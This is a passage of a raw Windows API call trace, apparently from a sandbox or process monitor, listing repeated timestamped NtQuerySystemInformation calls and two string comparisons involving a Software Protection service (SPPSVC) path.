SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.964] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0240.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.066] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 